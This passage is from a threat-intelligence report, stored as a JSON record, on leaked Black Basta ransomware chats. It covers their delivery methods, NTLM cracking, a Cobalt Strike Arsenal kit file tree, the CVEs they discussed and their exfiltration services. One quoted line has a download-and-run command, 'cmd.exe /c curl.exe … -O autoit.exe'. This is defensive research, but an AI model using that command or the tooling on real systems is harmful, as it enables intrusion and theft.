understand\r\nusernamegg,what cards are worth\r\nusernamegg,?\r\nusernameboy,4090\r\nusernameboy,I'll help a hunter set up a brute force)\r\nusernamegg,#NAME?\r\nusernamegg,come on\r\nusernamegg,is he bothering you?\r\nusernamegg, he also has normal abilities\r\nusernameboy,he doesn't know how to\r\nusernamegg,#NAME?\r\nusernamegg,will you decipher it in the end?\r\nusernameboy,Yes, we are looking for\r\nusernamegg,ntlm should get\r\nusernameboy,Yes\r\nusernamegg,ok\r\nusernameboy,There is ntlm\r\nusernamegg,let's go to the general chat\r\nusernameboy,already there\r\nusernameboy,Hi\r\nUsed to crack NTLMv1 hashes\r\n or attempted to crack password hashes themselves, but paying for services\r\ncould speed up the process.\r\nJenkins \u0026 RDP Targeting – 
Indicators suggest exploitation of exposed Jenkins servers and RDP access\r\npoints.\r\nSocial Engineering via IT Calls – Impersonation of IT departments for credential theft.\r\nMalware Deployment \u0026 Execution\r\nJavaScript in Malware – Leveraged for execution and persistence.\r\nDLL-based Malware – Use of DLL injection methods linked to Qbot variants.\r\nCobalt Strike – Likely used for command and control (C2), with Malleable C2 profiles observed.\r\nVBS \u0026 MSI Scripts – One of the more intriguing aspects of the discussions was Black Basta’s transition\r\nfrom using MSI file types to VBS scripts. They utilised a service called temp[.]sh to host these files online,\r\nenabling them to be embedded within malicious scripts for deployment.\r\nThe internal discussion regarding Black Basta focuses on MSI and VBS scripts, along with various other topics.\r\n## September 21, 2023\r\n**@usernamegg**\r\n\u003e We can try MSI with LNK. Need to test.\r\n\u003e VBS should be clean only by Monday.\r\n\u003e Or I can try to clean up this VBS.\r\n\u003e Let's clean it up.\r\n**@w**\r\n\u003e Do you have MSI or VBS?\r\n\u003e I have LNK ready immediately for MSI too.\r\n---\r\n## September 26, 2023\r\n**@usernamegg**\r\n\u003e [11:16:35] True PDF + XLL: What is being distributed right now—VBS or MSI?\r\n---\r\n## September 28, 2023\r\n**@w**\r\n\u003e Testing VBS.\r\n\u003e Will rework LNK now.\r\n\u003e If VBS turns out bad.\r\n**@usernamegg**\r\n\u003e Everything should be fine with VBS.\r\n---\r\n## October 2, 2023\r\n**@lapa**\r\n\u003e What does XLL execute, MSI or VBS?\r\n**@usernamegg**\r\n\u003e VBS.\r\n---\r\n## October 4, 2023\r\n**@usernamegg**\r\n\u003e I can only build one VBS.\r\n**@lapa**\r\n\u003e Right now, we are distributing zip + VBS.\r\n---\r\n## October 9, 2023\r\n**@usernamegg**\r\n\u003e The old MSI build was taken down.\r\n\u003e Once I link a new domain 
to a new server where the new software is,\r\n\u003e I'll distribute MSI and VBS from there.\r\n\u003e We’ll see which works better.\r\n\u003e I think VBS is better, but the execution method in the file will be different.\r\n---\r\n## October 10, 2023\r\n**@lapa**\r\n\u003e At least VBS gives a warning.\r\n\u003e MSI doesn't seem to.\r\n**@usernamegg**\r\n\u003e I'm taking the certificates and making VBS.\r\n---\r\n## October 16, 2023\r\n**@w**\r\n\u003e It was slightly different in VBS.\r\n\u003e The VBS script downloaded a simple command from the panel,\r\n\u003e like `cmd.exe /c curl.exe http[:]//domain.com:2351/adfguwie4 -O autoit.exe`,\r\n\u003e and just executed it.\r\nFigure 11: Fire Hosting Service\r\nCobalt Strike Arsenal kit\r\nThe collection of customizable tools that enable users to better simulate real-world adversary tactics and\r\ntechniques. – https://www.cobaltstrike.com/product/features\r\n.\r\n├── arsenal_kit.cna [32K]\r\n├── artifact [4.0K]\r\n│ ├── artifact32big.dll [455K]\r\n│ ├── artifact32big.exe [456K]\r\n│ ├── artifact32.dll [42K]\r\n│ ├── artifact32.exe [42K]\r\n│ ├── artifact32svcbig.exe [452K]\r\n│ ├── artifact32svc.exe [38K]\r\n│ ├── artifact64big.exe [454K]\r\n│ ├── artifact64big.x64.dll [454K]\r\n│ ├── artifact64.exe [42K]\r\n│ ├── artifact64svcbig.exe [450K]\r\n│ ├── artifact64svc.exe [38K]\r\n│ ├── artifact64.x64.dll [42K]\r\n│ ├── artifact.cna [9.3K]\r\n│ ├── paygen_big.py [9.7K]\r\n│ ├── sgn [7.9M]\r\n│ └── sgn.conf [557]\r\n├── mimikatz [4.0K]\r\n│ ├── mimikatz-chrome.x64.dll [755K]\r\n│ ├── mimikatz-chrome.x86.dll [624K]\r\n│ ├── mimikatz.cna [1.2K]\r\n│ ├── mimikatz-full.x64.dll [794K]\r\n│ ├── mimikatz-full.x86.dll [688K]\r\n│ ├── mimikatz-max.x64.dll [1.4M]\r\n│ ├── mimikatz-max.x86.dll [1.1M]\r\n│ ├── mimikatz-min.x64.dll [306K]\r\n│ └── mimikatz-min.x86.dll [270K]\r\n├── process_inject [4.0K]\r\n│ ├── processinject.cna [3.2K]\r\n│ 
├── process_inject_explicit.x64.o [2.0K]\r\n│ ├── process_inject_explicit.x86.o [2.1K]\r\n│ ├── process_inject_spawn.x64.o [1.7K]\r\n│ └── process_inject_spawn.x86.o [1.7K]\r\n├── resource [4.0K]\r\n│ ├── compress.ps1 [205]\r\n│ ├── resources.cna [6.5K]\r\n│ ├── template.exe.hta [830]\r\n│ ├── template.hint.x64.ps1 [2.7K]\r\n│ ├── template.hint.x86.ps1 [2.8K]\r\n│ ├── template.psh.hta [197]\r\n│ ├── template.py [635]\r\n│ ├── template.vbs [1017]\r\n│ ├── template.x64.ps1 [2.3K]\r\n│ ├── template.x86.ps1 [2.4K]\r\n│ └── template.x86.vba [3.8K]\r\n├── sleepmask [4.0K]\r\n│ ├── sleepmask.cna [1.6K]\r\n│ ├── sleepmask_pivot.x64.o [1.4K]\r\n│ ├── sleepmask_pivot.x86.o [1.4K]\r\n│ ├── sleepmask.x64.o [1.2K]\r\n│ └── sleepmask.x86.o [1.2K]\r\n└── udrl [4.0K]\r\n ├── ReflectiveLoader.x64.o [3.2K]\r\n ├── ReflectiveLoader.x86.o [2.7K]\r\n └── udrl.cna [11K]\r\nExploitation \u0026 Privilege Escalation\r\nMicrosoft Outlook RCE Exploit – This zero-click vulnerability in Outlook allows for remote code\r\nexecution without user interaction.\r\nWindows 10 RCE Exploit – A technique that circumvents ASLR/DEP protections, enabling remote\r\nexecution of code.\r\nESXi Server Targeting – A report from Microsoft back in 2024 highlights a concerning trend:\r\ncybercriminals are exploiting vulnerabilities in ESXi servers to deploy ransomware. This malicious activity\r\nposes significant risks to organisations relying on these servers. For more information, you can read the full\r\narticle on Exploiting ESXi servers to deploy ransomware.\r\nSearchProtocolHost.exe Abuse – The exploitation of a Windows system process for the covert execution of\r\nmalicious activities is a significant concern. 
This process is often targeted for techniques such as Process\r\nHollowing, which is a specific sub-technique within the broader category of Process Injection.\r\nUse of Proof of Concept Exploits:\r\nCVEs mentioned in the discussions or references and their age at the time of mention\r\nThe group seems to focus on both emerging vulnerabilities and previously identified ones during their discussions:\r\n| Date of Message (UTC) | CVE | Product | CVE Official Announcement Date (UTC) | CVE Age at the time (Months) |\r\n|---|---|---|---|---|\r\n| 2024-04-18 | CVE-2024-21338 | Microsoft Windows (Kernel) | 2024-04-18 | 0 |\r\n| 2024-04-15 | CVE-2024-21762 | Fortinet FortiGate SSL VPN | 2024-04-15 | 0 |\r\n| 2024-04-14 | CVE-2024-3400 | Palo Alto Networks (PAN-OS) | 2024-04-12 | 0 |\r\n| 2024-04-04 | CVE-2022-27925 | Zimbra Collaboration Suite | 2022-05-05 | 22 |\r\n| 2024-03-27 | CVE-2024-1086 | (Uncertain) Possibly Linux-based or Web-based? | 2024-03-27 | 0 |\r\n| 2024-02-25 | CVE-2024-1708 | ConnectWise ScreenConnect | 2024-02-25 | 0 |\r\n| 2024-02-25 | CVE-2024-1709 | ConnectWise ScreenConnect | 2024-02-25 | 0 |\r\n| 2024-02-15 | CVE-2024-21412 | Microsoft Windows Defender | 2024-02-15 | 0 |\r\n| 2023-12-15 | CVE-2017-5715 | Intel CPU (Spectre Variant 2) | 2018-01-03 | 71 |\r\n| 2023-12-15 | CVE-2017-5753 | Intel CPU (Spectre Variant 1) | 2018-01-03 | 71 |\r\n| 2023-12-15 | CVE-2017-5754 | Intel CPU (Meltdown) | 2018-01-03 | 71 |\r\n| 2023-12-13 | CVE-2023-35628 | Microsoft Word (Office) | 2023-08-08 | 4 |\r\n| 2023-12-05 | CVE-2023-23397 | Microsoft Outlook (Windows) | 2023-03-14 | 8 |\r\n| 2023-11-23 | CVE-2023-3466 | Citrix ADC/Gateway | 2023-07-18 | 4 |\r\n| 2023-11-23 | CVE-2023-3467 | Citrix ADC/Gateway | 2023-07-18 | 4 |\r\n| 2023-11-23 | CVE-2023-3519 | Citrix ADC/Gateway | 2023-07-18 | 4 |\r\n| 2023-11-22 | CVE-2023-4966 | Citrix NetScaler (ADC/Gateway) | 2023-11-14 | 0 |\r\n| 2023-11-14 | CVE-2023-36844 | Juniper Networks (J-Web) | 2023-08-16 | 2 |\r\n| 2023-11-14 | CVE-2023-36845 | Juniper Networks (J-Web) | 2023-08-16 | 2 |\r\n| 2023-11-07 | CVE-2020-1472 | Microsoft Netlogon (Windows Domain) | 2020-08-11 | 38 |\r\n| 2023-11-06 | CVE-2023-36884 | Microsoft Windows/Office | 2023-07-11 | 3 |\r\n| 2023-10-25 | CVE-2023-36745 | Microsoft Exchange Server | 2023-09-12 | 1 |\r\nCommand \u0026 Control (C2) Infrastructure\r\nCustom C2 Frameworks – This section delves into the creation of tailored Command and Control (C2)\r\ninfrastructures.\r\nSOCKS Proxy Services – These services are employed for traffic obfuscation and tunnelling purposes.\r\nHTTP \u0026 DNS Beacons – These may be linked to configurations used in Cobalt Strike.\r\nFile Hosting \u0026 Data Exfiltration\r\nFile-sharing Services Used:\r\nhxxps://send.vis[.]ee – Free file sharing service – (Still operational at the time of writing this blog)\r\nhxxps://transfer[.]sh – Open source file sharing platform.\r\nhxxp://temp[.]sh – At the time of writing this blog, the service still remains operational. For further\r\ndetails, please refer to Figure 1 located in the subsection titled “Malware Deployment \u0026\r\nExecution.”\r\nFTP has been widely used and SFTP has become more prominent over time.\r\nLeak Site Onion addresses\r\nOver 400 messages appear to mention .onion sites, including Black Basta, LockBit, Rhysida and other addresses,\r\nprimarily for victim leak communication and other leak forums.\r\nMITRE Techniques\r\nThe analysis of the conversations revealed several discussions focused on specific operations. We can interpret\r\nthese findings through the tactics outlined in the MITRE Framework. 
The graph below illustrates the tactics\r\nidentified from the conversations in the leaked bestflowers.json dataset.\r\nFigure 12: Black Basta MITRE Techniques\r\nConclusion\r\nThe leaked conversations of Black Basta provide a rare and valuable glimpse into the inner workings of a\r\nransomware group. Their structured approach uses advanced tactics and a methodical strategy for victim selection,\r\ndemonstrating a high level of operational sophistication.\r\nDespite recent inactivity, the data suggests internal conflicts rather than a complete shutdown, meaning Black\r\nBasta or its key members could resurface under a different guise. Their operational model aligns with other major\r\nransomware groups, focusing on financial gain through strategic targeting and calculated negotiations rather than\r\nindiscriminate disruption.\r\nThe attack chain typically begins with network reconnaissance, followed by exploitation of vulnerabilities in\r\nVPNs, firewalls, or phishing campaigns with malicious attachments. The group has been fairly interested in a\r\nwide variety of remote code execution (RCE) vulnerabilities.\r\nPost-compromise, they employ credential stuffing, NTLM password cracking, and the Cobalt Strike Arsenal kit, both\r\nfor lateral movement and persistence.\r\nAs part of their infrastructure, they used proxy chains, file sharing services, TOR, and TOX for general\r\ncommunications.\r\nFor cybersecurity teams and law enforcement agencies, these insights emphasize the need for continuous\r\nmonitoring, proactive threat intelligence, and improved security measures to counteract evolving ransomware\r\nthreats. 
Organisations should prioritise robust authentication measures, endpoint and server protection, phishing\r\nawareness training, backups and network segmentation to mitigate the risks.\r\nSources\r\nhttps://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/\r\nhttps://github.com/dutchcoders/transfer.sh\r\nhttps://www.theregister.com/2025/02/21/experts_race_to_extract_intel/\r\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/storm-0506\r\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/ta2101\r\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/unc4393\r\nhttps://ecrime.ch/\r\nhttps://x.com/PRODAFT/status/1892636346885235092\r\nSource: https://www.ontinue.com/resource/inside-black-basta-leaked-coversations/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.ontinue.com/resource/inside-black-basta-leaked-coversations/"
	],
	"report_names": [
		"inside-black-basta-leaked-coversations"
	],
	"threat_actors": [
		{
			"id": "e9f85280-337c-4321-b872-0919f8ef64a6",
			"created_at": "2022-10-25T16:07:24.261761Z",
			"updated_at": "2026-04-10T02:00:04.914455Z",
			"deleted_at": null,
			"main_name": "TA2101",
			"aliases": [
				"Gold Village",
				"Maze Team",
				"TA2101",
				"Twisted Spider"
			],
			"source_name": "ETDA:TA2101",
			"tools": [
				"7-Zip",
				"Agentemis",
				"BokBot",
				"Buran",
				"ChaCha",
				"Cobalt Strike",
				"CobaltStrike",
				"Egregor",
				"IceID",
				"IcedID",
				"Mimikatz",
				"PsExec",
				"SharpHound",
				"VegaLocker",
				"WinSCP",
				"cobeacon",
				"nmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f994aa54-3581-460a-9c1f-5ca6b1af4aa1",
			"created_at": "2024-08-20T02:00:04.537819Z",
			"updated_at": "2026-04-10T02:00:03.686083Z",
			"deleted_at": null,
			"main_name": "Storm-0506",
			"aliases": [],
			"source_name": "MISPGALAXY:Storm-0506",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "908cf62e-45cd-492b-bf12-d0902e12fece",
			"created_at": "2024-08-20T02:00:04.543947Z",
			"updated_at": "2026-04-10T02:00:03.68848Z",
			"deleted_at": null,
			"main_name": "UNC4393",
			"aliases": [
				"Storm-1811",
				"CURLY SPIDER",
				"STAC5777"
			],
			"source_name": "MISPGALAXY:UNC4393",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3c864b3-fac9-4d56-8500-7c06c829fbf8",
			"created_at": "2023-01-06T13:46:39.071873Z",
			"updated_at": "2026-04-10T02:00:03.203749Z",
			"deleted_at": null,
			"main_name": "TA2101",
			"aliases": [
				"GOLD VILLAGE",
				"Storm-0216",
				"DEV-0216",
				"UNC2198",
				"TUNNEL SPIDER",
				"Maze Team",
				"TWISTED SPIDER"
			],
			"source_name": "MISPGALAXY:TA2101",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434452,
	"ts_updated_at": 1775826736,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85bc8992c6e30f3420a14d18e477242505872058.pdf",
		"text": "https://archive.orkl.eu/85bc8992c6e30f3420a14d18e477242505872058.txt",
		"img": "https://archive.orkl.eu/85bc8992c6e30f3420a14d18e477242505872058.jpg"
	}
}